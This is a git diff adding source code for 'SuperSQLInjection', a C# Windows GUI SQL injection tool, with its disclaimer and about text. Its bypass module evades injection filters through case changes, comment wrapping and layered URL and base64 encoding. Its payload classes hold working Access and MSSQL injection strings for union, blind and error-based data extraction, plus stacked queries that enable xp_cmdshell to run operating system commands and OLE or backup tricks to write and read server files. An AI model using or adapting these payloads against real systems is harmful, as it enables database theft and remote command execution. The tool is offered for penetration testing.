+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Waring.Designer.cs b/SuperSQLInjection/Waring.Designer.cs
new file mode 100644
index 0000000..b817c57
--- /dev/null
+++ b/SuperSQLInjection/Waring.Designer.cs
@@ -0,0 +1,63 @@
+namespace SuperSQLInjection
+{
+ partial class Waring
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.richTextBox1 = new System.Windows.Forms.RichTextBox();
+ this.SuspendLayout();
+ //
+ // richTextBox1
+ //
+ this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.richTextBox1.Location = new System.Drawing.Point(0, 0);
+ this.richTextBox1.Name = "richTextBox1";
+ this.richTextBox1.Size = new System.Drawing.Size(487, 115);
+ this.richTextBox1.TabIndex = 0;
+ this.richTextBox1.Text = "本工具提供给个人、站长、企业、渗透测试工程师、Web安全工程师等信息安全人员进行信息安全检查工具,请勿利用此工具进行非授权测试,产生的法律责任与作者无关。\n作者:" +
+ "shack2\nQQ:1341413415\n博客:www.shack2.org";
+ //
+ // Waring
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(487, 115);
+ this.Controls.Add(this.richTextBox1);
+ this.Name = "Waring";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "声 明";
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.RichTextBox richTextBox1;
+
+
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/Waring.cs b/SuperSQLInjection/Waring.cs
new file mode 100644
index 0000000..88c50f8
--- /dev/null
+++ b/SuperSQLInjection/Waring.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class Waring : Form
+ {
+ public Waring()
+ {
+ InitializeComponent();
+ }
+ }
+}
diff --git a/SuperSQLInjection/Waring.resx b/SuperSQLInjection/Waring.resx
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/Waring.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/about.resx b/SuperSQLInjection/about.resx
new file mode 100644
index 0000000..3adea21
--- /dev/null
+++ b/SuperSQLInjection/about.resx
@@ -0,0 +1,139 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ 版本:超级SQL注入工具 v1.0 正式版
+说明:
+超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。
+支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。
+支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
+支持Bool型盲注、错误显示注入、Union注入。
+支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
+支持简单的SQL注入绕过,可灵活进行字符替换绕过注入防护。
+支持批量爬行扫描SQL注入或导入连接,批量探测是否可以注入。
+本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。不适合新手人员使用,谢谢!
+工具特点:
+1.支持任意地点出现的任意SQL注入
+2.支持全自动识别注入标记,也可人工识别注入并标记。
+3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
+4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
+5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
+官网:www.shack2.org
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/app.config b/SuperSQLInjection/app.config
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/SuperSQLInjection/app.config
@@ -0,0 +1,3 @@
+
+
+
diff --git a/SuperSQLInjection/bypass/StringReplace.cs b/SuperSQLInjection/bypass/StringReplace.cs
new file mode 100644
index 0000000..7f6a8ab
--- /dev/null
+++ b/SuperSQLInjection/bypass/StringReplace.cs
@@ -0,0 +1,248 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using SuperSQLInjection.model;
+using System.Text.RegularExpressions;
+using SuperSQLInjection.tools;
+using System.Collections;
+using tools;
+
+namespace SuperSQLInjection.bypass
+{
+ class StringReplace
+ {
+ public static String strReplaceCenter(Config config, String request, Hashtable replaceList)
+ {
+
+ //找到需要处理的字符
+ MatchCollection mc = Regex.Matches(request, "(?<=(\\))[.\\s\\S]*?(?=(\\))");
+ String str="";
+ foreach (Match m in mc)
+ {
+ str = m.Value;
+
+ if (config.reaplaceBeforURLEncode || config.isOpenURLEncoding==false)
+ {
+ //替换字符
+ str = ReplaceString(replaceList, str);
+ if (config.inculdeStr)
+ {
+ String split = " ";
+ ///*!包含分隔符*/
+ String val=getValue(replaceList," ");
+ if (!"".Equals(val)) {
+ split = val;
+ }
+ str = ReplaceString(str, split);
+ }
+ if (config.isOpenURLEncoding)
+ {
+ //URL编码
+ str = urlEncoding(str, config.urlencodeCount);
+ }
+ }
+ else {
+
+ if (config.inculdeStr)
+ {
+ ///*!包含*/
+ str = ReplaceString(str, "%20");
+ }
+ if (config.isOpenURLEncoding)
+ {
+ //URL编码
+ str = urlEncoding(str,config.urlencodeCount);
+
+ }
+ //替换字符
+ str = ReplaceString(replaceList, str);
+ }
+ //随机大小写
+ if (config.keyReplace>0)
+ {
+ String splitstr = " ";
+ if (config.isOpenURLEncoding) {
+ splitstr = "%20";
+ }
+ str = toLowerOrUpperCase(str, splitstr, config.keyReplace);
+ }
+ //base64处理
+ if (config.base64) {
+ str = base64Encoding(str,config.base64Count);
+ }
+ //替换request
+ request = request.Replace("" + m.Value + "", str);
+ }
+ return request;
+ }
+
+ public static String urlEncoding(String str,int index)
+ {
+
+ for (int i = 1; i <= index; i++)
+ {
+ str=URLEncode.UrlEncode(str);
+ }
+ return str;
+
+ }
+
+
+ public static String base64Encoding(String str,int index) {
+
+ for (int i = 1; i <= index; i++) {
+ str = Convert.ToBase64String(Encoding.UTF8.GetBytes(str));
+ }
+ return str;
+
+ }
+ public static String ReplaceString(Hashtable repalceList,String str) {
+ if (repalceList != null && repalceList.Count > 0) {
+ try
+ {
+ IDictionaryEnumerator ite = repalceList.GetEnumerator();
+ while (ite.MoveNext())
+ {
+ String key = ite.Key.ToString();
+ if (!String.IsNullOrEmpty(key)) {
+ str = str.Replace(key, ite.Value + "");
+ }
+
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("替换字符发生错误!----" + e.Message);
+ }
+
+ }
+ return str;
+
+ }
+
+ public static String ReplaceString(String oldStr,String splitStr)
+ {
+ StringBuilder sb = new StringBuilder();
+ try
+ {
+
+ String[] strs = Regex.Split(oldStr, splitStr.Replace("/**/","/\\*\\*/"));
+ for (int i = 0; i < strs.Length; i++) {
+ sb.Append("/*!" + strs[i] + "*/");
+ sb.Append(splitStr);
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("使用/*!*/包含关键字发生错误!----" + e.Message);
+ }
+ return sb.ToString().Remove(sb.Length-splitStr.Length,splitStr.Length);
+
+ }
+
+ public static String getValue(Hashtable table, String key)
+ {
+ try
+ {
+ IDictionaryEnumerator ite = table.GetEnumerator();
+ while (ite.MoveNext())
+ {
+ if (key.Equals(ite.Key)) {
+ return ite.Value+"";
+ }
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("获取对应键值对发生错误!----" + e.Message);
+ }
+ return "";
+ }
+
+
+ public static String randStr(String key) {
+ StringBuilder sb = new StringBuilder();
+ Char[] cs = new Char[key.Length];
+ cs = key.ToCharArray(0, key.Length);
+ for (int j = 0; j < cs.Length; j++)
+ {
+ string c = cs[j] + "";
+ if (j % 2 == 0)
+ {
+ c = c.ToUpper();
+ }
+ else
+ {
+ c = c.ToLower();
+ }
+ sb.Append(c);
+ }
+ return sb.ToString();
+ }
+
+ public static String toLowerOrUpperCase(String oldStr, String split,int changeType)
+ {
+
+ StringBuilder sb = new StringBuilder();
+ try
+ {
+ MatchCollection mc = Regex.Matches(oldStr, "([a-zA-Z_\\.]+"+split+ "|[a-zA-Z_\\.]+\\()");
+ foreach (Match m in mc) {
+
+ String keyStr =m.Groups[0].Value;
+ //库名.表不处理防止部分情况出现错误
+ if (keyStr.IndexOf(".") != -1) {
+ continue;
+ }
+ if (changeType == 1) {
+ oldStr = oldStr.Replace(keyStr, randStr(keyStr));
+ }
+ if (changeType == 2)
+ {
+ oldStr = oldStr.Replace(keyStr, keyStr.ToUpper());
+ }
+ if (changeType == 3)
+ {
+ oldStr = oldStr.Replace(keyStr, keyStr.ToLower());
+ }
+ m.NextMatch();
+
+ }
+ /*
+ String[] strs = Regex.Split(oldStr, split);
+ for (int i = 0; i < strs.Length; i++)
+ {
+ String s = strs[i];
+ if (s.IndexOf(".") != -1||s.IndexOf("@") != -1||s.IndexOf("(") != -1)
+ {
+ sb.Append(s);
+ }
+ else {
+ Char[] cs=new Char[s.Length];
+ cs = s.ToCharArray(0, s.Length);
+ for (int j = 0; j < cs.Length; j++)
+ {
+ string c = cs[j]+"";
+ if (j % 2 == 0)
+ {
+ c = c.ToUpper();
+ }
+ else {
+ c = c.ToLower();
+ }
+ sb.Append(c);
+ }
+ }
+ if (i+1 != strs.Length) {
+ sb.Append(split);
+ }
+ }*/
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("生成随机大小写字母发生错误!----" + e.Message);
+ }
+ return oldStr.Replace("0X","0x");
+ }
+ }
+}
diff --git a/SuperSQLInjection/model/Config.cs b/SuperSQLInjection/model/Config.cs
new file mode 100644
index 0000000..3f7b3b9
--- /dev/null
+++ b/SuperSQLInjection/model/Config.cs
@@ -0,0 +1,65 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Collections;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public class Config
+ {
+ public Config() {
+
+ }
+ public String domain = "";
+ public int port = 80;
+ public int maxTime = 10;//延时注入判断阀值
+ public InjectType injectType=new InjectType();
+ public DBType dbType = new DBType();
+ public int timeOut = 10;//秒
+ public int threadSize = 1;
+ public int reTry = 2;
+ public String encoding = "UTF-8";
+ public String request = "";
+ public String key = "";
+ public String db_encoding = "";
+ public Boolean useCode = false;
+ public int columnsCount = 0;
+ public int showColumn = 0;
+ public Boolean reverseKey = false;//反取关键字
+ public KeyType keyType = KeyType.Key;//判断类型,可以盲注以关键字或时间判断
+ public Boolean isMuStr = true;//开启多字节字符
+ public Boolean is_foward_302 = false;
+ public Boolean isOpenInfoLog=true;//开启底部日志
+ public Boolean isOpenHTTPLog = true;//开启HTTP日志
+ public Boolean isAutoCheckUpdate = true;//自动检查更新
+ public Boolean isSavaConfigWhenClose = true;//自动保存配置
+ public Boolean useSSL = false;//ssl
+ public Boolean isOpenURLEncoding = true;//开启URL编码
+ public Boolean redirectDoGet = false;//重定向使用的请求方法
+ public int maxClolumns = 50;
+ public int urlencodeCount = 1;//url编码次数
+
+ //file
+ public String readFileEncoding = "GBK";
+
+ //cmd
+ public Boolean showCmdResult = true;
+
+ //bypass
+
+ public Boolean reaplaceBeforURLEncode = true;//是否在URL编码前处理bypass字符
+ public Boolean inculdeStr = false;
+ public int keyReplace = 0;
+ public String randIPToHeader = "";
+ public int sendHTTPSleepTime = 0;
+ public String replaceStrs="";//字符替换
+ public Boolean base64 = false;//base64
+ public int base64Count = 0;
+ //scan
+ public int level = 0;
+ public int linkCount = 1;
+ public int maxSpiderCount=10;
+ public int maxScanCount = 10;
+ }
+}
diff --git a/SuperSQLInjection/model/DBType.cs b/SuperSQLInjection/model/DBType.cs
new file mode 100644
index 0000000..663061a
--- /dev/null
+++ b/SuperSQLInjection/model/DBType.cs
@@ -0,0 +1,17 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum DBType
+ {
+ UnKnow=0,
+ Access=1,
+ MySQL5 = 2,
+ SQLServer = 3,
+ Oracle = 4,
+ MySQL4 = 5
+ }
+}
diff --git a/SuperSQLInjection/model/DataBase.cs b/SuperSQLInjection/model/DataBase.cs
new file mode 100644
index 0000000..c2fbe51
--- /dev/null
+++ b/SuperSQLInjection/model/DataBase.cs
@@ -0,0 +1,14 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public class DataBase
+ {
+ public SerializableDictionary>> tables=new SerializableDictionary>>();
+ }
+}
diff --git a/SuperSQLInjection/model/ErrorMessage.cs b/SuperSQLInjection/model/ErrorMessage.cs
new file mode 100644
index 0000000..6314570
--- /dev/null
+++ b/SuperSQLInjection/model/ErrorMessage.cs
@@ -0,0 +1,13 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ public static class ErrorMessage
+ {
+ public static String mysql4_no_error_inject_info = "抱歉MySQL4数据库,不支持错误显示注入!";
+ public static String access_no_error_inject_info = "抱歉Access数据库,不支持错误显示注入!";
+ public static String access_no_key = "Access数据库需要关键字协助盲猜表明,所以大侠请你填写好关键字!";
+ }
+}
diff --git a/SuperSQLInjection/model/GetDataPam.cs b/SuperSQLInjection/model/GetDataPam.cs
new file mode 100644
index 0000000..c5f6c34
--- /dev/null
+++ b/SuperSQLInjection/model/GetDataPam.cs
@@ -0,0 +1,19 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection.model
+{
+ class GetDataPam
+ {
+
+ public List columns = null;
+ public int limit = 0;
+ public String dbname = "";
+ public String table = "";
+ public Boolean isMuStr = false;//开启多字节
+ public ListViewItem lvi = null;
+ public int data_count =0;
+ }
+}
diff --git a/SuperSQLInjection/model/InjectType.cs b/SuperSQLInjection/model/InjectType.cs
new file mode 100644
index 0000000..c091311
--- /dev/null
+++ b/SuperSQLInjection/model/InjectType.cs
@@ -0,0 +1,16 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum InjectType
+ {
+ UnKnow = 0,
+ Bool=1,
+ Error=2,
+ Union = 3,
+ Sleep=4
+ }
+}
diff --git a/SuperSQLInjection/model/Injection.cs b/SuperSQLInjection/model/Injection.cs
new file mode 100644
index 0000000..962250e
--- /dev/null
+++ b/SuperSQLInjection/model/Injection.cs
@@ -0,0 +1,20 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ public class Injection
+ {
+ public String url="";
+ public int index = 0;
+ public bool isInjection =false;
+ public String injectType = "";
+ public String payload="";
+ public String paramName = "";
+ public String dbType = "";
+ public String remark = "";
+ public String testUrl = "";
+
+ }
+}
diff --git a/SuperSQLInjection/model/KeyType.cs b/SuperSQLInjection/model/KeyType.cs
new file mode 100644
index 0000000..7484139
--- /dev/null
+++ b/SuperSQLInjection/model/KeyType.cs
@@ -0,0 +1,15 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum KeyType
+ {
+ Key=0,
+ Code=1,
+ Length=2,
+ Time = 3
+ }
+}
diff --git a/SuperSQLInjection/model/SelectNode.cs b/SuperSQLInjection/model/SelectNode.cs
new file mode 100644
index 0000000..7dbf0c7
--- /dev/null
+++ b/SuperSQLInjection/model/SelectNode.cs
@@ -0,0 +1,16 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection.model
+{
+ public class SelectNode
+ {
+ public TreeNode tn = new TreeNode();
+ public int limit = 0;
+ public String dbname = "";
+ public String tableName = "";
+ public String columnName = "";
+ }
+}
diff --git a/SuperSQLInjection/model/SerializableDictionary.cs b/SuperSQLInjection/model/SerializableDictionary.cs
new file mode 100644
index 0000000..062ad94
--- /dev/null
+++ b/SuperSQLInjection/model/SerializableDictionary.cs
@@ -0,0 +1,62 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Xml;
+using System.Xml.Schema;
+using System.Xml.Serialization;
+
+namespace SuperSQLInjection.model
+{
+
+ [Serializable]
+ public class SerializableDictionary : Dictionary, IXmlSerializable
+ {
+ public SerializableDictionary() { }
+ public void WriteXml(XmlWriter write) // Serializer
+ {
+ XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
+ XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
+
+ foreach (KeyValuePair kv in this)
+ {
+ write.WriteStartElement("SerializableDictionary");
+ write.WriteStartElement("key");
+ KeySerializer.Serialize(write, kv.Key);
+ write.WriteEndElement();
+ write.WriteStartElement("value");
+ ValueSerializer.Serialize(write, kv.Value);
+ write.WriteEndElement();
+ write.WriteEndElement();
+ }
+ }
+ public void ReadXml(XmlReader reader) // Deserializer
+ {
+ reader.Read();
+ XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
+ XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
+
+ while (reader.NodeType != XmlNodeType.EndElement)
+ {
+
+ reader.ReadStartElement("SerializableDictionary");
+ reader.ReadStartElement("key");
+ TKey tk = (TKey)KeySerializer.Deserialize(reader);
+ reader.ReadEndElement();
+ reader.ReadStartElement("value");
+ TValue vl = (TValue)ValueSerializer.Deserialize(reader);
+ reader.ReadEndElement();
+ reader.ReadEndElement();
+ this.Add(tk, vl);
+ reader.MoveToContent();
+ }
+ reader.ReadEndElement();
+
+ }
+ public XmlSchema GetSchema()
+ {
+ return null;
+ }
+ }
+ }
+
diff --git a/SuperSQLInjection/model/ServerInfo.cs b/SuperSQLInjection/model/ServerInfo.cs
new file mode 100644
index 0000000..f87caaa
--- /dev/null
+++ b/SuperSQLInjection/model/ServerInfo.cs
@@ -0,0 +1,30 @@
+using System;
+using System.Collections.Generic;
+using System.Net;
+using System.Text;
+
+namespace model
+{
+ public class ServerInfo
+ {
+ public String host = "";//host主机头
+ public String url = "";//pathAndQuery
+ public int port = 80;
+ public String request = "";
+ public String encoding = "";
+ public String header = "";
+ public String body = "";
+ public String reuqestBody = "";
+ public String reuqestHeader = "";
+ public Dictionary headers = new Dictionary();
+ public String response = "";
+ public String gzip = "";
+ public int length = 0;
+ public int code = 0;
+ public int location = 0;
+ public int runTime = 0;//获取网页消耗时间,毫秒
+ public int sleepTime = 0;//休息时间
+ public String cookies = "";
+ public Boolean timeout = false;
+ }
+}
diff --git a/SuperSQLInjection/model/URL.cs b/SuperSQLInjection/model/URL.cs
new file mode 100644
index 0000000..e60183d
--- /dev/null
+++ b/SuperSQLInjection/model/URL.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ class URL
+ {
+ public String url;
+ public int level;
+ public URL(String url, int level) {
+
+ this.url = url;
+ this.level = level;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/payload/Access.cs b/SuperSQLInjection/payload/Access.cs
new file mode 100644
index 0000000..cbbcde7
--- /dev/null
+++ b/SuperSQLInjection/payload/Access.cs
@@ -0,0 +1,79 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.payload
+{
+ class Access
+ {
+ //获取数据条数
+ public static String data_count = "(select count(*) from {table})";
+
+ //判断条数
+ public static String bool_datas_count = " and " + data_count + ">={len}";
+
+ public static String substr = "mid(({data}),{index},1)";
+
+ //bool方式字符长度判断
+ public static String bool_length = " and len({data})>{len}";
+
+ public static String bool_value = " and {data}>{len}";
+
+ //获取行数据
+ public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from {table} order by {orderby} asc) t order by t.{orderby} desc)";
+
+ //union获取值
+ public static String union_value = " and 1=2 union all select {data} from {table}";
+
+ //多字符
+ public static String unicode_value = "ascw(mid({data},{index},1))";
+
+
+ public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String table, String index)
+ {
+ StringBuilder sb = new StringBuilder();
+ String data = "chr(94)&chr(94)&chr(33)&" + Comm.unionColumns(columns, "&chr(36)&chr(36)&chr(36)&") + "&chr(33)&chr(94)&chr(94)";
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index).Replace("{orderby}", columns[0]));
+ sb.Append(",");
+ }
+ else
+ {
+ sb.Append("1,");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+
+ public static String getUnionDataValue(int columnsLen, int showIndex, int Fill, String dataPayLoad)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append("(chr(94)&chr(94)&chr(33)&" + dataPayLoad + "&chr(33)&chr(94)&chr(94)),");
+ }
+ else
+ {
+ sb.Append(Fill + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+ public static String getBoolDataPayLoad(String column,List columns,String dbName, String table, int index)
+ {
+ String data = data_value.Replace("{data}",column).Replace("{allcolumns}",Comm.unionColumns(columns,",")).Replace("{orderby}",columns[0]);
+ String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
+ return payload;
+ }
+
+
+ }
+}
diff --git a/SuperSQLInjection/payload/Comm.cs b/SuperSQLInjection/payload/Comm.cs
new file mode 100644
index 0000000..d40b20a
--- /dev/null
+++ b/SuperSQLInjection/payload/Comm.cs
@@ -0,0 +1,69 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.payload
+{
+ class Comm
+ {
+ public static String exists_table = " and exists(select 1 from {0})";
+ public static String exists_column = " and exists(select {0} from {1})";
+ public static String truePayload = " and 1=1";
+ public static String falsePayload = " and 1=2";
+
+ public static String unionColumns(List columns, String unionStr)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (String column in columns)
+ {
+
+ sb.Append(column + unionStr);
+ }
+ sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
+ return sb.ToString();
+ }
+
+
+ public static String unionColumnCountTest(int maxColumn,int fill)
+ {
+ StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
+ for (int i = 1; i <= maxColumn;i++ )
+ {
+ sb.Append(fill+"+"+i+",");
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return sb.ToString();
+ }
+
+ public static String unionColumnCountTestByOracle(int maxColumn, String fill)
+ {
+ StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
+ for (int i = 1; i <= maxColumn; i++)
+ {
+ sb.Append(fill + ",");
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return sb.ToString()+" from dual";
+ }
+
+ public static String unionColumnCountTestByOracle(int maxColumn,int testIndex,String fill)
+ {
+ StringBuilder sb = new StringBuilder(" and 1=2 union all select ");
+ for (int i = 1; i <= maxColumn; i++)
+ {
+ if (i == testIndex)
+ {
+ sb.Append(fill + ",");
+ }
+ else
+ {
+ sb.Append("null" + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return sb.ToString() + " from dual";
+ }
+
+
+ }
+}
diff --git a/SuperSQLInjection/payload/MSSQL.cs b/SuperSQLInjection/payload/MSSQL.cs
new file mode 100644
index 0000000..df17f48
--- /dev/null
+++ b/SuperSQLInjection/payload/MSSQL.cs
@@ -0,0 +1,271 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using tools;
+
+namespace SuperSQLInjection.payload
+{
+ class MSSQL
+ {
+ //加载对应配置(需要读取的环境变量)
+ public static String path = "config/sqlserver/ver.txt";
+ public static List vers = FileTool.readFileToList(path);
+
+
+ //数据库数量
+ public static String dbs_count = "(select count(*) from [master]..[sysdatabases])";
+ //表数量
+ public static String tables_count = "(select count(*) from [{dbname}]..[sysobjects] where xtype=0x55)";
+ //列数量
+ public static String columns_count = "(select count(*) from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))";
+ //获取数据条数
+ public static String data_count = "(select count(*) from [{dbname}]..[{table}])";
+
+
+ //获取数据库名
+ public static String db_value = "(select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc)";
+ //获取表名称
+ public static String table_value = "(select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55))";
+ //获取列名称
+ public static String column_value = "(select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}')))";
+
+
+ //获取数据库数量bool方式
+ public static String bool_db_count = " and " + dbs_count + ">{len}";
+ //获取表数量bool
+ public static String bool_tables_count = " and " + tables_count + ">{len}";
+ //获取列数量bool
+ public static String bool_columns_count = " and " + columns_count + ">{len}";
+
+ public static String bool_datas_count = " and " + data_count + ">={len}";
+
+ //多字符
+ public static String unicode_value = "cast(unicode(substring({data},{index},1)) as varchar(100))";
+
+ public static String substr = "substring(({data}),{index},1)";
+ public static String substr_value = "substring(({data}),{index},{len})";
+
+ //bool方式字符长度判断
+ public static String bool_length = " and len({data})>{len}";
+ public static String bool_dataLength = " and datalength({data})>{len}";
+ public static String bool_value = " and {data}>{len}";
+
+ //bool方式获取值
+
+ //每个unicode值范围0-9
+ public static String bool_unicode_value = " and (substring({data},{index},1))>{len}";
+
+ //获取行数据
+ public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from [{dbname}]..[{table}] order by {orderby}) t order by {orderby} desc)";
+
+ //union获取值
+ public static String union_value = " and 1=2 union all select {data}";
+
+ //error方式
+ public static String error_value = " or convert(int,(char(94)+char(94)+char(33)+cast({data} as varchar(2000))+char(33)+char(94)+char(94)))=1";
+
+
+ //cmd
+ public static String createTable = ";drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data text);exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd--";
+ public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
+ public static String cmdDataCount = "(select count(*) from ssqlinjection)";
+ public static String dropTable = ";drop table ssqlinjection;--";
+
+
+ //文件读写
+ public static String witeFileByFileSystemObject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;--";
+ public static String witeFileBySP_MakeWebTask = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;--";
+ public static String witeFileByBackDataBase = ";drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;--";
+ public static String readFileByFileSystemobject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);--";
+
